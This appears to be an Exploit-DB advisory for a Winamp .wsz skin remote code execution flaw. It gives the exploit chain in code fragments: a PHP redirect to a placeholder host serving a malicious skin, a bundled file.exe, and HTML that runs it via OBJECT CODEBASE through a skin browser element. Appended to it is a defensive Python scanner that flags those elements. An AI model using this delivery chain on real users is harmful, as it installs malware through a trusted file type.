NullSoft Winamp 2-5 - .wsz Remote Code Execution Vulnerability

ID EDB-ID:24413
Type exploitdb
Reporter anonymous
Modified 2004-07-26T00:00:00


NullSoft Winamp 2-5 .WSZ File Remote Code Execution Vulnerability. Remote exploit for the Windows platform.


A vulnerability in Winamp has been discovered that may permit remote attackers to execute arbitrary code on client computers through a malicious .WSZ Winamp skin file. This issue is currently being exploited in the wild.

This vulnerability may be exploited through a Web site, or any other means that will allow the attacker to transmit the malicious file to a victim user.

This vulnerability is reported to affect all versions of Winamp up to and including 5.04. 

<frameset rows="*,1" framespacing="0" border="0" frameborder="NO">
<frame src="load.php" name="frame_content" scrolling="auto" noresize>

$httpref = $HTTP_REFERER;
header("Location: http://URL/foo.wsz");

foo.wsz (
/html/file.exe (malicious file to execute)
/html/test.htm (html to load the .exe)

<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111123' CODEBASE='file.exe'>

<include file="player.xml"/>

<browser id="browser" x="0" y="0" w="0" h="0" relatw="1" relath="1" url="file:///@SKINPATH@html/test.htm" />

<container id="main" name="main">
<include file="player-normal.xml"/>

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>

<WinampAbstractionLayer version="1.1">
<author>Petrol Designs</author>

<include file="xml/includes.xml"/>
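
A defender-side check for the archive layout shown above, as an added example that is not part of the original advisory: it scans a .wsz (assumed here to be a ZIP archive, as Winamp skin files are) for bundled executables, a skin `<browser>` element pointing at `@SKINPATH@` HTML, and an HTML `<OBJECT>` with `CODEBASE`. The function names, rule labels, the member path `xml/player-normal.xml` and both sample archives are constructed for illustration.

```python
import io
import re
import zipfile

EXEC_EXTS = (".exe", ".dll", ".scr", ".com", ".bat", ".cmd", ".pif")
MARKUP_EXTS = (".xml", ".htm", ".html")
MAX_MARKUP = 1 << 20  # never inflate more than 1 MiB of markup per member
# <browser ... url="file:///@SKINPATH@..."> : the skin loads HTML shipped inside itself
BROWSER_LOCAL = re.compile(rb"<browser\b[^>]*\burl\s*=\s*[\"']file:[^\"']*@SKINPATH@", re.I)
# <OBJECT ... CODEBASE=...> : the HTML asks the embedded browser to fetch and run code
OBJECT_CODEBASE = re.compile(rb"<object\b[^>]*\bcodebase\s*=", re.I)

def scan_wsz(data: bytes) -> list:
    """Return a sorted list of 'rule:member' findings for one .wsz archive."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return ["not-a-zip"]
    findings = set()
    with zf:
        for info in zf.infolist():
            name, lower = info.filename, info.filename.lower()
            with zf.open(info) as fh:
                head = fh.read(2)  # "MZ" catches executables hidden behind another extension
            if lower.endswith(EXEC_EXTS) or head == b"MZ":
                findings.add("executable:" + name)
            elif lower.endswith(MARKUP_EXTS) and info.file_size <= MAX_MARKUP:
                body = zf.read(info)
                if BROWSER_LOCAL.search(body):
                    findings.add("browser-local-html:" + name)
                if OBJECT_CODEBASE.search(body):
                    findings.add("object-codebase:" + name)
    return sorted(findings)

def build_zip(members: dict) -> bytes:
    """Constructed sample input: pack {name: bytes} into an in-memory ZIP."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()

# Constructed samples: inert placeholder bytes laid out like the page's foo.wsz, and a plain skin.
SUSPECT = build_zip({
    "html/file.exe": b"MZ-placeholder-not-a-real-binary",
    "html/test.htm": b"<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111123' CODEBASE='file.exe'>",
    "xml/player-normal.xml": b'<browser id="browser" url="file:///@SKINPATH@html/test.htm" />',
})
CLEAN = build_zip({"skin.xml": b'<WinampAbstractionLayer version="1.1"/>', "main.png": b"\x89PNG"})
```

Any finding on a skin downloaded from the Web is reason to quarantine the file before it reaches the player; the advisory lists all versions up to and including 5.04 as affected.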